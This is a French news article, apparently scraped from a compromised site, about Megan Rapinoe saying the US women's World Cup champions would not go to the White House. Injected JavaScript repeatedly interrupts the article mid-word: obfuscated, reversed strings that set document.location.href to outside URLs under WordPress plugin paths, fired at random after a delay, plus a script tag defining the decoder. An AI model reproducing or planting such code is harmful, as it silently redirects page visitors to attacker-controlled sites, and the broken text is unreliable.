FOOTBALL

Football: Par peur d’être “exhibées”, les Américaines n’iront pas à la Maison Blanche selon Rapinoe

COUPE DU MONDE – Championnes du titre, les Américaines n’ont pas encore eu les faveurs d’une invitation à la Maison Blanche. Invité sur CNN, Megan Rapinoe a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toutefois réitéré son envie de ne pas recevoir les félicitations du président américain Donald Trump, à qui elle s’est opposée publiquement. Une position commune à l’ensemble des championnes du monde selon elle.

Une pièce dans la machine. La star de l’équipe américaine de football Megan Rapinoe a affirmé mardi que ses coéquipières n’accepteraient probablement pas, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tout comme elle, une invitation à la Maison Blanche après leur sacre lors de la Coupe du monde féminine de football en France.

Par peur d’être “exhibées”, les Américaines n’iront pas à la Maison Blanche selon Rapinoe

Par AFP

Le 10/07/2019 à 07:40Mis à jour Le 10/07/2019 à 07:49

COUPE DU MONDE – Championnes du titre, les Américaines n’ont pas encore eu les faveurs d’une invitation à la Maison Blanche. Invité sur CNN, Megan Rapinoe a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toutefois réitéré son envie de ne pas recevoir les félicitations du président américain Donald Trump, à qui elle s’est opposée publiquement. Une position commune à l’ensemble des championnes du monde selon elle.

Une pièce dans la machine. La star de l’équipe américaine de football Megan Rapinoe a affirmé mardi que ses coéquipières n’accepteraient probablement pas, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tout comme elle, une invitation à la Maison Blanche après leur sacre lors de la Coupe du monde féminine de football en France.Prêts pour un Extraordinaire Voyage au Futuroscope ?Envolez-vous !

Je n’irais pas” si la Maison Blanche lançait cette invitation “et je crois que toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toutes les membres de l’équipe à qui j’ai parlé explicitement de cela n’iraient pas”, a-t-elle déclaré lors d’une interview sur CNN. Megan Rapinoe, qui revendique son homosexualité et est engagée politiquement, avait beaucoup fait parler d’elle durant la compétition en affirmant qu’elle n’irait pas à “la p…. de Maison Blanche“.

Selon l’attaquante, qui s’est excusée d’avoir juré toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tout en maintenant sa position, cette rencontre serait “une opportunité pour l’administration” Trump d'”exhiber” l’équipe. “Je ne pense pas du toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tout que cela fasse sens pour nous. Je ne peux pas imaginer qu’une de mes coéquipières veuille être mise dans cette position“, a-t-elle insisté.

La trentenaire, sacrée meilleure joueuse et buteuse du Mondial, a également vivement attaqué le président américain sur sa politique. Interrogée sur ce qu’elle voudrait lui dire, Megan Rapinoe a répondu en s’adressant directement à lui, fixant la caméra: “Je pense que je dirais que votre message exclut des gens. Vous m’excluez. Vous excluez les gens qui me ressemblent.”

Je pense que vous vous référez à une ère qui n’était pas géniale pour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tout le monde“, a-t-elle ajouté, en référence au slogan de Donald Trump “Make America Great Again” (rendre sa grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andeur à l’Amérique). Donald Trump, qui avait affirmé qu’il inviterait l’équipe américaine quel que soit le résultat, l’avait prise à partie sur Twitter: “Megan ne devrait jamais manquer de respect à notre pays, à la Maison Blanche et à notre drapeau”.

Megan Rapinoe (attaquante et capitaine des Etats-Unis, vainqueurs de la Coupe du Monde après leur vic<script data-recalc-dims=$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toire 2-0″/>

Source: Eurosport

%d blogueurs aiment cette page :